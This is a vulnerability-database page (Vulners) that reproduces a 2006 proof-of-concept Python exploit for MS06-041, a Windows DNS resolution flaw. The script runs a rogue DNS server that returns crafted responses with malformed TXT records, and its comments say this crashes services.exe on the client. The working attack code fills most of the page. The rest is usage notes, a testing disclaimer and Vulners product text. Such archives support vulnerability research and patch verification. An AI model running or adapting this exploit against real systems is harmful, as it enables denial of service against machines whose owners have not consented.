Vulners
Lucene search
Microsoft Windows - DNS Resolution Remote Denial of Service (PoC) (MS06-041)
#!/usr/bin/python
#POC for MS06-041
#Run the python script passing the local ip address as parameter. The DNS server
#will start listening on this ip address for DNS hostname resolution queries.
#This script is for testing and educational purpose and so to test this one will
#have to point the DNS resolver on the target/client to the ip address on which
#this script runs.
#Open up internet explorer and type in a hostname. services.exe will crash.
#You may have to repeat this two or three times to see the crash in services.exe
# Tested on Windows 2000 server SP0 and SP1 inside VmWare. Could not
# reproduce on SP4 though it is also vulnerable. May be I missed something :)
#
# For testing/educational purpose. Author shall bear no responsibility for any screw ups
# Winny Thomas ;-)
import sys
import struct
import socket
class DNSserver:
def __init__(self, localhost):
self.response = ''
self.__create_socket(localhost)
def __create_socket(self, localhost):
self.host = localhost
self.port = 53
self.DNSsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.DNSsocket.bind((self.host, self.port))
print 'Awaiting DNS queries'
print '====================\n'
while 1:
self.__await_query()
def __await_query(self):
self.Query, self.Addr = self.DNSsocket.recvfrom(1024)
print 'Query from: ' + str(self.Addr)
self.TransactID = self.Query[0:2]
self.__find_type(self.Query[2:])
def __find_type(self, Question):
qType = struct.unpack('>H', Question[0:2])
if qType[0] == 256:
self.__send_response(Question[10:-4])
def __send_response(self, sName):
self.response = self.TransactID
self.response += '\x85\x80' #Flags
self.response += '\x00\x01' #Questions
self.response += '\x00\x02' #Answer RR's
self.response += '\x00\x01' #Authority RR
self.response += '\x00\x00' #Additional RR
#QUERIES
#self.response += sName
self.response += '\x04\x74\x65\x73\x74\x07\x68\x61\x63\x6b\x65'
self.response += '\x72\x73\x03\x63\x6f\x6d\x00'
self.response += '\x00\xff' #request all records
self.response += '\x00\x01' #inet class
#ANSWERS
#A record
self.response += '\xc0\x0c\x00\x01\x00\x01\x00\x00\x00\x07'
self.response += '\x00\x04\xc0\xa8\x00\x02' #A type record (IP add)
#TXT record
self.response += '\xc0\x0c\x00\x10\x00\x01\x00\x00\x00\x07'
self.response += '\x00\x18' #TXT record length
self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
self.response += '\x00' #Zero length TXT RDATA
self.response += '\x00' #Zero length TXT RDATA
self.response += '\x08\x50\x52\x4f\x54\x4f\x43\x4f\x4c'
self.response += '\x00' #Zero length TXT RDATA
self.response += '\x00' #Zero length TXT RDATA
self.response += '\x01\x41'
#Authoritative Nameservers
self.response += '\xc0\x11\x00\x02\x00\x01\x00\x01\x51\x80'
self.response += '\x00\x0b\x08\x73\x63\x6f\x72\x70\x69\x6f'
self.response += '\x6e\xc0\x11'
self.DNSsocket.sendto(self.response, (self.Addr))
if __name__ == '__main__':
try:
localhost = sys.argv[1]
except IndexError:
print 'Usage: %s <local ip for listening to DNS request>' % sys.argv[0]
sys.exit(-1)
D = DNSserver(localhost)
# milw0rm.com [2006-12-09]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 Dec 2006 00:00Current
7.4High risk
Vulners AI Score7.4